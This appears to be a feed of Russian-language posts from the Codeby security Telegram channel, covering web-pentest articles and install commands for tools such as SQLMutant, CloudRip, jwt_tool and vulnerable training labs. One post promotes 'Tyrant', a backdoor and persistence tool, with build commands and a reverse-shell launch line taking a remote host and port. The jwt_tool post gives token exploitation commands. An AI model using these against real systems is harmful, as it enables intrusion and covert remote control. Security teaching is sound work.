Codeby
36.3K subscribers
2.08K photos
98 videos
12 files
7.86K links
Блог сообщества Кодебай

Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.academy

CTF: hackerlab.pro

VK: vk.com/codeby
YT: clck.ru/XG99c

Сотрудничество: @KinWiz

Реклама: @Savchenkova_Valentina
Download Telegram
Создаём беспалевный web-shell и испытываем в боевых условиях

В один прекрасный день мне вдруг захотелось написать свой web-shell. Зачем же изобретать велосипед? Практика показала, что немалая часть из популярных веб-шеллов имеют на борту стучалки/звонилки, и прочие нехорошие внедрения. Правда в погоне за функционалом, встречается и избыточность, например в b374k куча вкладок из того что есть в phpinfo. Также большая часть веб-шеллов написана в 2004-2006 годах, и имеют устаревшие или нерабочие фичи.

📌 Читать далее

#programming #web #shell
👍20🔥81🤔1
Авторизация и аутентификация web-приложений (for example python Flask)

Запланировал разобрать аутентификацию и авторизацию веб-приложений на примере Flask. Это первая часть из моей серии, т.к информации достаточно много и я стараюсь правильно ее распределить. Я сам если честно не люблю тонны скучных определений, поэтому постараюсь донести свои мысли более-менее интересно (не факт) Но все же теория - основа доказательства (только что придумал) и блин, я не понимаю откуда мое непреодолимое желание ставить скобки)). Итак, если кратко, то в этой части хочу разобрать что вообще такое Фласк (если кто не знаком), для чего используются печеньки и сессии в веб-приложениях, запустить свое приложение для тестов и примеров.

📌 Читать далее

#programming #python #web
👍13🔥2🤯2
Расширение HackBar для Burp Suite и для браузеров

Доброго времени суток, уважаемые форумчане! Сегодня мы рассмотрим очень полезный инструмент, который должен здорово помочь ученикам при прохождении курса WAPT. Он не относится к разряду средств автоматизации, а потому разрешен в процессе обучения и сдачи экзамена. Это HackBar. В сети можно найти достаточно материала по этому инструменту и очень сложно быть оригинальным в этом вопросе, поэтому я решил рассмотреть все его возможные вариации на нескольких практических примерах. Будем крутить union-based sql-инъекцию. Хотя инструмент способен помочь в эксплуатации различных уязвимостей, таких как XXE, XXS, LFI, RFI, а также поможет обходить фильтрацию, имеет встроенный кодировщик и ряд других функций. Короче, очень удобный инструмент для веб-пентеста. По сути, в него зашито большое количество пейлоадов на все случаи жизни, которые вы можете подставлять в уязвимые места. Это должно сэкономить массу времени и исключить возможные ошибки при наборе запросов.

📌 Читать далее

#pentest #web #sqlmap
👍153😍3
Создаём беспалевный web-shell и испытываем в боевых условиях

В один прекрасный день мне вдруг захотелось написать свой web-shell. Зачем же изобретать велосипед? Практика показала, что немалая часть из популярных веб-шеллов имеют на борту стучалки/звонилки, и прочие нехорошие внедрения. Правда в погоне за функционалом, встречается и избыточность, например в b374k куча вкладок из того что есть в phpinfo. Также большая часть веб-шеллов написана в 2004-2006 годах, и имеют устаревшие или нерабочие фичи.

📌 Читать далее

#programming #web #shell
👍8🔥5😍1
Что хранят в себе скрытые файлы и папки на веб-сервере? Часть I

Доброго времени суток! Сегодня я хочу рассказать, что содержат в себе скрытые папки и файлы на веб-сервере. Скрытые файлы и директории, которые оставляют на веб сервере, могут иметь важную, конфиденциальную информацию. Веб-сервер может содержать много скрытой информации. Давайте взглянем на все это более детально, что бы узнать какую информацию можно найти.

📌 Читать далее

#beginner #web #information
👍11🔥5🏆1
Авторизация и аутентификация web-приложений (for example python Flask)

Запланировал разобрать аутентификацию и авторизацию веб-приложений на примере Flask. Это первая часть из моей серии, т.к информации достаточно много и я стараюсь правильно ее распределить. Я сам если честно не люблю тонны скучных определений, поэтому постараюсь донести свои мысли более-менее интересно (не факт) Но все же теория - основа доказательства (только что придумал) и блин, я не понимаю откуда мое непреодолимое желание ставить скобки)). Итак, если кратко, то в этой части хочу разобрать что вообще такое Фласк (если кто не знаком), для чего используются печеньки и сессии в веб-приложениях, запустить свое приложение для тестов и примеров.

📌 Читать далее

#programming #python #web
🔥8👍32🥴2
Защита Apache, Nginx и IIS

Наверняка вы периодически слышите словосочетание веб-сервер или название любой технологии из заголовка статьи. Все нынешние веб-сайты работают по технологии клиент - сервер. В роли клиента выступает ваш браузер, а роли сервера удаленный компьютер. Ни для кого ни секрет, что браузер общается с сайтом на языке HTTP запросов. С браузером все понятно, он умеет обрабатывать эти запросы, но как удаленный сервер прочитает запрос и в целом как он будет выстраивать общение с клиентом? Ответ прост - веб-сервер.

📌 Читать далее

#security #network #web
👍8🔥3
PHP уязвимости

Уязвимость PHP injection – одна из распространенных скриптовых уязвимостей, которая встречается в приложениях, написанных на PHP языке. Заключается в исполнении постороннего кода на стороне сервера.

Рассказали в статье про:
✔️ Информацию об уязвимости
✔️ Эксплуатацию PHP Injection через RFI
✔️ Другие методы эксплуатации уязвимости

📌 Читать далее

#forum #web #php
👍14🔥64
XXE уязвимости

XML External Entity (XXE) – это тип атаки, использующий уязвимости в анализаторах XML. При атаке XXE можно внедрить специально созданный XML-контент в приложение, которое его обрабатывает.

В этой статье:
✔️Рассказали о типах XXE
✔️На практике подробно рассмотрели данную атаку

📌 Читать далее

#forum #web #xxe
🔥7👍3
Создаём беспалевный web-shell и испытываем в боевых условиях

Всем привет, друзья!

В один прекрасный день мне вдруг захотелось написать свой web-shell. Зачем же изобретать велосипед? Практика показала, что немалая часть из популярных веб-шеллов имеют на борту стучалки/звонилки, и прочие нехорошие внедрения. Правда в погоне за функционалом, встречается и избыточность, например в b374k куча вкладок из того что есть в phpinfo. Также большая часть веб-шеллов написана в 2004-2006 годах, и имеют устаревшие или нерабочие фичи.

📌 Читать далее

#programming #web #shell
👍125🔥3😁2
Информативная картинка о том, как работает LFI и что это такое.

#LFI #Web #Picture

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19🔥138
SQLMutant

SQLMutant — это инструмент для тестирования SQL-инъекций, включающий как пассивные, так и активные процессы разведки для любого заданного домена. Он фильтрует URL-адреса, чтобы выявить те, параметры которых подвержены SQL-инъекциям, а затем выполняет атаки с использованием инъекций. Эти атаки включают сопоставление шаблонов, анализ ошибок и атаки по времени.

📕Характиристика:
1️⃣URL Fuzzer - Эта функция позволяет пользователю указать целевой URL-адрес, а затем выполнить фаззинговую атаку для обнаружения любых уязвимых параметров, которые могут быть использованы для SQL-инъекций.
2️⃣SQL Payloads - SQLMutant предоставляет набор предопределенных полезных нагрузок для SQL-инъекций, которые можно использовать для проверки наличия уязвимостей.
3️⃣Header Fuzzer - Эта функция позволяет пользователю фаззингировать HTTP-заголовки для проверки на наличие уязвимостей SQL-инъекций.
4️⃣Waybackurls Integration - В SQLMutant интегрирован инструмент Waybackurls, используемый для поиска исторических версий веб-страницы. Эта функция позволяет находить страницы, которые больше недоступны, но могут содержать уязвимости, существовавшие в прошлом.
5️⃣Arjun Integration - SQLMutant также интегрирует инструмент Arjun, который используется для поиска скрытых параметров и каталогов на веб-сервере.

💻Установка:
pip3 install uro --break-system-packages

sudo apt install golang-go

export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin

Лучше добавить эти команды в ~/.bashrc
go install github.com/tomnomnom/waybackurls@latest

sudo apt-get install arjun

go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest

sudo apt-get install jq toilet lolcat

git clone https://github.com/blackhatethicalhacking/SQLMutant.git

cd SQLMutant/

chmod +x SQLMutant.sh


📌Запуск:
./SQLMutant.sh


#tools #web #SQL

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
😱118👍8😢7🔥4👎3🗿2😁1
CloudRip

Инструмент, помогающий найти реальные IP-адреса, скрывающиеся за Cloudflare, путем проверки поддоменов. Подходит для тестирования на проникновение, исследований в области безопасности и изучения принципов работы защиты Cloudflare.

📕Характеристика:
1️⃣Обнаружение нескольких IP-адресов — находит ВСЕ IP-адреса за доменом, а не только первый
2️⃣Динамическое обнаружение IP-адресов Cloudflare — получает последние диапазоны IP-адресов из API Cloudflare (с резервным вариантом)
3️⃣Фильтрация IP-адресов Cloudflare — показывает только реальные адреса серверов
4️⃣Ограничение скорости — не будет рассылать спам целевому серверу и блокировать вас
5️⃣Поддержка IPv4 и IPv6 — разрешает записи A и AAAA

💻Установка:
git clone https://github.com/moscovium-mc/CloudRip

cd CloudRip/

pip3 install -r requirements.txt


📌Запуск:
python3 cloudrip.py <DOMAIN>

Запуск и использованием нескольких словарей:
python3 cloudrip.py <DOMAIN> -w <WORDLIST> -w <WORDLIST2>

Запуск с подробным режимом:
python3 cloudrip.py <DOMAIN> -v


#tools #osint #web

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
14👍9🔥8
OpenSquat

openSquat — это инструмент кибербезопасности, основанный на разведке на основе открытых источников, который выявляет угрозы киберсквоттинга, нацеленные на ваш бренд или домены. Утилита полезна для определения фишинга.

📕Характиристика:
1️⃣Phishing - Фейковые домены, имитирующие ваш сайт.
2️⃣Тайпосквоттинг - Домены с распространенными опечатками (например, codeeby.net).
3️⃣IDN Homograph - Символы, похожие на символы других алфавитов (например, cоdeby.net (буква о кириллическая)).
4️⃣Интеграция с VirusTotal - для проверки репутации домена.
5️⃣Quad9 DNS validation - для выявления вредоносных доменов.

💻Установка:
git clone https://github.com/atenreiro/opensquat.git

cd opensquat/

pip install -r requirements.txt --break-system-packages


📌Запуск:
python opensquat.py

В файле keywords.txt вы можете вписать интересующий вас домен.


#tools #osint #web

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
👍98🔥4
🔗Возникали ли у вас когда-либо вопросы на каких ресурсах можно безопасно тестировать различные инструменты, предназначенные для поиска уязвимостей в веб-приложениях?

В этой статье познакомимся с некоторыми известными и опенсорсными веб-приложениями, которые специально содержат уязвимостями и предназначены для обучения специалистов и тестирования инструментов безопасности.

➡️OWASP Juice Shop
Уязвимое веб-приложение от компании OWASP, реализованное на JavaScript и TypeScript. Juice Shop содержит более 100 различных уязвимостей, таких как SQL-инъекции, межсайтовый скриптинг (XSS), межсайтовый скриптинг с использованием CSRF (Cross-Site Scripting), переполнение буфера и многое другое.

➡️Установка
docker pull bkimminich/juice-shop
docker run --rm -p 127.0.0.1:3000:3000 bkimminich/juice-shop

Далее приложение будет доступно по адресу http://localhost:3000. Рекомендуемые системные требования: 384 МБ ОЗУ, 800 МБ свободного места на диске.

➡️DVWA (Damn Vulnerable Web Application)
Веб-приложение на PHP/MariaDB, намеренно разработанное как уязвимое.

Цель DVWA — отработать некоторые из наиболее распространенных уязвимостей в веб-приложениях с разным уровнем сложности и простым и понятным интерфейсом. В этом программном обеспечении есть как задокументированные, так и незадокументированные уязвимости.

➡️Установка
git clone https://github.com/digininja/DVWA.git
cd DVWA
docker compose up -d

Далее приложение будет доступно по адресу http://localhost:4280.

➡️OWASP WebGoat
Еще одно намеренно небезопасное веб-приложение от OWASP для тестирования уязвимостей, часто встречающиеся в приложениях на Java.

➡️Установка
docker run -it -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 webgoat/webgoat

Для некоторых уроков требуется, чтобы контейнер работал в том же часовом поясе. Это решается с помощью переменной среды TZ:
docker run -it -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=America/Boise webgoat/webgoat

Далее приложение будет доступно по адресу http://www.webgoat.local:8080/WebGoat/.

❗️ Стоит отметить, что во время работы описанных веб-приложений ваш компьютер становится крайне уязвим для атак. Поэтому во время использования программ рекомендуется ограничить доступ к интернету.

#tools #web #pentest

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
👍149🔥6❤‍🔥2
🔑 Gixy-Next — инструмент для анализа безопасности конфигураций Nginx

Gixy — это open source-анализатор конфигураций Nginx, который помогает находить потенциальные уязвимости, ошибки и небезопасные настройки. Инструмент особенно полезен как для DevOps задач так и для проведения пентеста web-инфраструктуры. Он автоматически проверяет конфигурационные файлы и выявляет проблемы, которые могут привести к утечкам данных, обходу ограничений или выполнению вредоносных запросов.


Основные возможности
📉 Анализ конфигураций Nginx — поиск небезопасных директив и ошибок
📉 Обнаружение уязвимостей — выявляет SSRF, open redirect, header injection и др.
📉 Проверка include-файлов — анализирует всю цепочку конфигураций
📉 Плагины — расширяемая система проверок
📉 Простой запуск — не требует сложной настройки
🖱 Быстрая проверка — подходит для CI/CD и автоматизации

Как работает Gixy
Gixy анализирует конфигурацию Nginx и применяет набор правил для поиска проблем:
▶️ парсинг nginx.conf и include-файлов
▶️ анализ директив и их комбинаций
▶️ проверка потенциально опасных паттернов
▶️ выявление логических ошибок конфигурации

Инструмент находит проблемы, связанные с:
⏺️SSRF
⏺️Open Redirect
⏺️Unsafe proxy_pass
⏺️Header Injection

🧾 Пример использования
Установка
pip3 install gixy-next


Запуск проверки
gixy /etc/nginx/nginx.conf


Проверка директории
gixy /etc/nginx/


#nginx #security #devops #pentest #web #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
11🔥6👍5
Tyrant

Tyrant — это вредоносный инструмент, используемый для тестирования на проникновение и обеспечения постоянного присутствия под удаленным управлением, обладающий обширными возможностями.


📐Основные характеристики:
📉Reverse shell: позволяет злоумышленнику инициировать сеанс командной оболочки с указанным UID пользователя, получая соответствующие привилегии.
📉Внедрение и сохранение бэкдора: внедряет бэкдор в целевую систему и обеспечивает сохранение контроля даже после перезагрузки системы.
📉Загрузка веб-оболочки Tyrant: загружает и запускает обратную оболочку Tyrant через веб-доступ.
📉Шифрование и поддельные протоколы: использует поддельные токены JWT и зашифрованную связь для обхода обнаружения системы безопасности.
🖱Восстановление по SSH: позволяет злоумышленнику повторно подключиться и восстановить бэкдор через SSH.

⬇️Установка:
0️⃣Клонирование репозитория и переход в рабочую директорию:
git clone https://github.com/MartinxMax/Tyrant.git

cd Tyrant/


1️⃣Установка зависимостей:
sudo apt-get install zlib1g-dev libzstd-dev libssl-dev


2️⃣Компиляция бинарного файла:
gcc -static -o tyrant tyrant.c ./lib/core.c ./lib/random_md5.c -lssl -lcrypto -lz -lzstd


⛓️‍💥Запуск:
./tyrant -uid [UID] -rhost [RHOST] -rport [RPORT]


#web

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
10👍7🔥7
JWT_TOOL

jwt_tool - это набор инструментов для проверки, подделки, сканирования и изменения JWT (JSON Web Tokens).


📐Функциональность:
📉Проверка действительности токена
📉Проверка на наличие уязвимостей - (CVE-2015-2951, CVE-2016-10555, CVE-2018-0114 и т.д)
📉Проверка на наличие некорректных настроек или известных уязвимостей.
📉Выявление слабых ключей с помощью высокоскоростной словарной атаки
🖱Генерация и восстановление ключей RSA и ECDSA (из файлов JWKS)

⬇️Установка:
0️⃣Клонирование репозитория:
git clone https://github.com/ticarpi/jwt_tool.git

1️⃣Переход в рабочую директорию:
cd jwt_tool/


⛓️‍💥Запуск:
➡️Разведка:
python3 jwt_tool.py <JWT_TOKEN>

➡️Сканирование:
python3 jwt_tool.py -t <URL> -rc "jwt=<JWT_TOKEN>;anothercookie=hack" -M pb

➡️Эксплуатация:
python3 jwt_tool.py -t <URL> -rc "jwt=<JWT_TOKEN>;anothercookie=hack" -X i -I -pc name -pv admin

➡️Фаззинг (более глубокий анализ):
python3 jwt_tool.py -t <URL> -rc "jwt=<JWT_TOKEN>;anothercookie=hack" -I -hc kid -hv custom_sqli_vectors.txt


#web #jwt

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
4👍3🔥3